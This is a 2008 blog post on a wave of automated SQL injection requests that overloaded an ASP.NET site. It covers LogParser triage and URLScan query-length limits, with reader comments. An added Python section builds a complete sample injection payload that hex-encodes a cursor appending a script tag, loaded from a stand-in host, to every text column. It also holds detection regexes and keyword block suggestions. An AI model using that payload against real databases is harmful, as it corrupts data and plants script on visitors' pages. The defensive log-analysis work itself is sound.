Dealing With Denial of Service Attacks

As Scott wrote last week, using a punny title I have to admire, he and I (among many others) were both the subject of a DoS (Denial of Service) attack. Looking through my logs, it actually appears to be a DDoS (Distributed Denial of Service) attack, since the requests come from multiple IP addresses.

The attack actually appears to be an attempt at SQL injection, but for his blog, which stores its data in XML files, that is entirely pointless. For my blog, which doesn't do any inline SQL, it's also mostly pointless. So far the SQL injection part of the attack has failed, but it has succeeded in pegging my CPU. Maybe that's the actual intended goal; only the attacker knows.

LogParser Queries

The first clue (besides my site being down) is that my log file for today is huge at 9:00 AM.


The next step is to run some queries against my logs using the fantastic LogParser tool. The post entitled Forensic Log Parsing with Microsoft's LogParser is a great resource for constructing queries, although its focus is on investigating an actual intrusion, while the queries I need are for working out what kind of DoS attack I'm experiencing. Here's the query I'm using so far:

  logparser "SELECT c-ip, COUNT(*), STRLEN(cs-uri-query) as LENGTH, cs-uri-query 
  FROM C:\WINDOWS\system32\LogFiles\W3SVC1\ex080822.log 
  GROUP BY Length, cs-uri-query, c-ip 
  HAVING Length > 500 
  ORDER BY LENGTH DESC" -rtp:-1 > long-query.txt

Note that I'm running this against a single day's log file; a wildcard in the FROM clause would run it across all of them. The very last snippet, > long-query.txt, redirects the output to a text file, and -rtp:-1 tells LogParser to print all rows rather than paginating them. Here's a snippet of one of the query strings I'm seeing:

?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST…*snip*…%20AS%20CHAR(4000));EXEC(@S);

These query strings are all very long. Interestingly, there is no smooth transition in length: for example, there are no query strings of length 500 to 1000 at all. The legitimate ones are short and the injection attempts all exceed 1000 characters.

URLScan

I then installed URLScan 3.0 Beta, which Scott wrote about, opened its configuration file (located at C:\WINDOWS\system32\inetsrv\urlscan\UrlScan.ini by default) and lowered the following setting near the bottom, which caps the length of query string URLScan will let through to the application. It ships with this default:

  MaxQueryString=2048

I changed that 2048 to a smaller value; any request whose query string exceeds the limit is rejected before it reaches ASP.NET. The LogParser output above tells you how low is safe: pick a value that sits in the gap between the longest legitimate query string and the shortest attack string.

The other setting I changed is to allow dots in the path (it defaults to 0, which rejects such requests), because I have many URLs that contain dots.

  AllowDotInPath=1
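Here is the same triage done in Python rather than LogParser, as an added example that is not part of the original post. It parses a few constructed IIS W3C log lines, reproduces the "long query strings per IP" report from the LogParser section above, fingerprints the DECLARE/CAST/EXEC pattern, decodes the hex blob inside the CAST (the real one is snipped above; the payload here is a constructed stand-in modelled on what the comments below describe), buckets query-string lengths to find the gap that a MaxQueryString value should sit in, and models URLScan's length check from the URLScan section. The log lines, IP addresses and payload are all constructed, and the way MaxQueryString is compared against the raw query string is my assumption about URLScan's behaviour, not something the post states.

```python
"""Triage of IIS W3C logs for long CAST/EXEC SQL-injection query strings.

Added example, not code from the original post. All log lines, addresses and
the hidden SQL payload below are constructed for the demonstration.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed stand-in for the hex-encoded SQL the post snips out. It mirrors
# what the comments describe (cursor over sysobjects/syscolumns, append a
# <script> tag to every character column); it is NOT the real worm payload.
CONSTRUCTED_PAYLOAD_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
    "from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://example.invalid/x.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_PAYLOAD = CONSTRUCTED_PAYLOAD_SQL.encode("ascii").hex().upper()
INJECTED_QUERY = ("id=12';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD
                  + "%20AS%20CHAR(4000));EXEC(@S);--")

# Constructed W3C extended log excerpt with a trimmed field list. IIS writes
# cs-uri-query as received, still percent-encoded, and "-" when it is empty.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-08-22 09:00:01 GET /archive/2008/08/22/dos.aspx id=12 192.0.2.10 200",
    "2008-08-22 09:00:02 GET /default.aspx " + INJECTED_QUERY + " 198.51.100.7 200",
    "2008-08-22 09:00:02 GET /about.aspx " + INJECTED_QUERY.replace("id=12", "id=7") + " 198.51.100.7 200",
    "2008-08-22 09:00:05 GET /default.aspx " + INJECTED_QUERY + " 203.0.113.9 200",
    "2008-08-22 09:00:06 GET /tags/asp.net.mvc/ - 192.0.2.11 200",
])


def parse_w3c(text):
    """Turn a W3C extended log into dicts keyed by the names in the #Fields line."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def long_queries(rows, min_len=500):
    """Python equivalent of the LogParser query: hits per (c-ip, query string)
    for query strings longer than min_len, longest first."""
    hits = Counter((r["c-ip"], r["cs-uri-query"]) for r in rows
                   if len(r["cs-uri-query"]) > min_len)
    return sorted(((ip, n, len(q), q) for (ip, q), n in hits.items()),
                  key=lambda t: t[2], reverse=True)


def length_histogram(rows, width=500):
    """Count query strings per length bucket. A gap between the legitimate
    (short) and injected (long) buckets is where MaxQueryString should sit."""
    return Counter((len(r["cs-uri-query"]) // width) * width for r in rows)


CAST_RE = re.compile(r"CAST\(0x([0-9A-F]+)\s+AS\s+(N?)(?:VAR)?CHAR\(\d+\)\)", re.I)
FINGERPRINT_RE = re.compile(r"DECLARE\s+@\w+.*?CAST\(0x[0-9A-F]+.*?EXEC\(@\w+\)", re.I | re.S)


def is_cast_injection(raw_query):
    """Fingerprint of the attack: DECLARE @var ... CAST(0x...) ... EXEC(@var)."""
    return FINGERPRINT_RE.search(unquote(raw_query)) is not None


def decode_cast_payload(raw_query):
    """Recover the SQL hidden in CAST(0x... AS [N][VAR]CHAR). NVARCHAR payloads
    are UTF-16LE, CHAR/VARCHAR ones single-byte; returns None if absent."""
    m = CAST_RE.search(unquote(raw_query))
    if not m:
        return None
    blob = bytes.fromhex(m.group(1))
    return blob.decode("utf-16-le" if m.group(2).upper() == "N" else "latin-1")


def urlscan_rejects(raw_query, max_query_string):
    """Model of URLScan's MaxQueryString check on the query string as received
    (assumption: URLScan compares the raw, still-encoded length)."""
    return len(raw_query) > max_query_string


if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_LOG)
    for ip, n, length, q in long_queries(rows):
        print(f"{ip:15} {n:3} hits  len={length}  sqli={is_cast_injection(q)}")
    print("length buckets:", dict(sorted(length_histogram(rows).items())))
    print("decoded payload:", decode_cast_payload(long_queries(rows)[0][3])[:60], "...")
```

Run it against a real ex*.log by replacing SAMPLE_LOG with the file's contents; the histogram is the quickest way to confirm that a MaxQueryString value will block the attack strings without touching legitimate traffic.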

What others have said

Dale Ragan Aug 22, 2008 10:52 AM
# re: Dealing With Denial of Service Attacks
I was wondering what happened. I was trying to find some resources on ASP.NET MVC yesterday from you and site was running really slow.

Glad to see you're back up.
haacked Aug 22, 2008 11:56 AM
# re: Dealing With Denial of Service Attacks
Thanks! Me too!
Mike Brown Aug 22, 2008 1:08 PM
# re: Dealing With Denial of Service Attacks
Phil,
Did you know Julius Carry (AKA Shonuff) died of pancreatic cancer recently? blogs.bet.com/.../?cid=idnb

I do love that movie though...I'll probably watch it tonight.
Wili Aug 22, 2008 1:57 PM
# re: Dealing With Denial of Service Attacks
I have seen this show up also on our server. Does anyone know what kind of SQL injection attack it is? What will it do to SQL Server if it was allowed to run?
Sergey Aug 22, 2008 2:02 PM
# re: Dealing With Denial of Service Attacks
Congrats with successful fighting because I also noticed today some *lag* :) Now it seems to work smoothly. Btw seems this line "From its default of 2048 to another smaller value." should be one paragraph above ;)

Andrei Rinea Aug 22, 2008 3:36 PM
# DDoS basics?
I am not very educated in the (D)DoS area but I guess you could very well study the behavior of a site and learn which requests take the longest time. These might be requests that take a lot of CPU and/or RAM and/or other resources (Network I/O, Disk I/O etc.)

Then you might pound the site from multiple IPs for these certain requests and peg the CPU for a while (until your IPs get banned or sth...)

Phil, maybe you could delight us with a post regarding how (D)DoS's work and how we can efficiently protect against them.

Thanks,
Andrei.
Rod Mac Aug 22, 2008 3:54 PM
# ...same here on the hour
I am experiencing something very similar (lines and lines of declares then encoded characters) and it appears to be an append to a query string in the vain hope that a stored procedure is somehow going to accept a verbose string as a param instead of an integer. It is very weird and happens almost hourly. The site is not down though and I've thought about a redirect back to the mitigating IP address. Is someone trying to overwhelm SQL Server but to gain what? If anyone's got any light on this, would like to hear.
HeartattacK Aug 22, 2008 4:10 PM
# re: Dealing With Denial of Service Attacks
Great...err...phil....could you please change your gravatar? It's so not you...and it kind of scares me (everytime I look at it) :)
George McKee Aug 22, 2008 4:10 PM
# re: Dealing With Denial of Service Attacks
Wili asked what this SQL Injection attack will do. This looks identical to an attack I saw on one of my classic ASP sites in late April and early May. If successful the SQL script (which is binary encoded) injects an XSS script tag into every (n)varchar field of every table in your database. The length of the varchar fields affected must be about 50 characters or larger to be affected. Cleaning up this mess is a real PITA. Besides validating the length and data type of anything collected off the query string, other things you can do to protect yourself are to limit the length of an allowable query string and disallow SQL reserved words like DECLARE or CAST or EXEC.
Edward J. Stembler Aug 22, 2008 4:10 PM
# re: Dealing With Denial of Service Attacks
I wonder if you or anyone else can offer up anything more substantial?

Are there are any automated tools or utilities out there to help identify an attack? Anything which could automatically block the attackers?

Last year when I discovered my SQL Server database was the subject of a brute force attack, I was able to block the attacks via manually creating an IP/Sec policy.

I wonder if IP/Sec could be used similarly to block a DDoS or DoS attack? I'm no expert when it comes to IP/Sec, and found it pretty tedious/confusing to setup last year.
Steve Sheldon Aug 22, 2008 9:06 PM
# re: Dealing With Denial of Service Attacks
The attack appears to actually be an attempt at a SQL Injection attack


Uhh, this stupid thing has been spreading across the Internet for about the last 4 months. It's not DDoS, it's a worm. It's really quite clever. The SQL it's inserting tells it to look at all tables and append javascript to any of the varchar columns.

URLScan is a good way of stopping it.

The other thing, apparently the worm is searching google for .asp and .aspx extensions.
mark Aug 23, 2008 1:10 AM
# re: Dealing With Denial of Service Attacks
for these types of attack, i wonder which http status code is best to return? maybe 404?
Denny Ferrassoli Aug 23, 2008 5:33 PM
# re: Dealing With Denial of Service Attacks
More info about these SQL Injection attacks can be found here: www.lockergnome.com/.../sql-injection-attacks-i...
Abdu Aug 25, 2008 9:48 AM
# re: Dealing With Denial of Service Attacks
I use Simple DNS Plus as my dns server software which has a nice feature of automatically blocking ip addresses which exceeded a number of requests per second or per minute. (One can exempt ip addresses). Effectively blocking DDOS attacks. It takes a lot less CPU there than letting IIS use URL Scan to handle these attacks.

You can probably do the same thing through your firewall if the firewall supports that.

URLScan is doing too much work to eliminate these attacks. While it can be effective, it's at the expense of CPU cycles.

Abdu
Edward J. Stembler Aug 25, 2008 3:36 PM
# re: Dealing With Denial of Service Attacks
I recently upgraded to a new router which supports SPI:

The SPI (Stateful Packet Inspection) Firewall protects your LAN against Denial of Service attacks.
Janet Sep 28, 2008 3:52 AM
# re: Dealing With Denial of Service Attacks
Recently my website got DDOS attack, and my server went down for 24 hours. I hope your Tips will help in future attacks.
Rob Reid Oct 02, 2008 4:43 PM
# re: Dealing With Denial of Service Attacks
The majority of these automated hackbots originate in China or Russia so if you wanted to eliminate 90% of attacks you could block those countries. There is a tool widely available that the hackers use to create an attack. They just enter the URLs that they want injected and press the run button. The bot then uses Google to find sites to attack and then tampers with as many URLs as possible in the hope of coming across a hole in the site. I would say this isn't really an SQL DOS attack as they tend to consume your DB server's CPU by running long-winded queries involving convoluted LIKE and OR statements in the hope of searching all your data and returning no records.
The fact that your CPU was hit may just be down to the frequency and number of these automated bots that are currently doing the rounds. I was logging 2000+ attempts of this form of SQL injection up until a few months ago. I have reduced the number of logged attempts down to less than 5 a day now by using ISAPI rewrite rules to redirect any requests containing the 3 most common SQL injection fingerprints about to a banned page.

You can see details of the rules and other quick fix "plasters" on an article I wrote about the matter.

blog.strictly-software.com/.../...ection-hack.html
Hussain Jan 23, 2009 5:47 AM
# I want to learn Denial of Service Attacks
I want to learn Denial Of service attacks.What can i do?
Saro May 15, 2009 3:36 AM
# re: Dealing With Denial of Service Attacks
How can I test myself with a DOS attack? Is it possible? How can I prevent this (more detailed info)?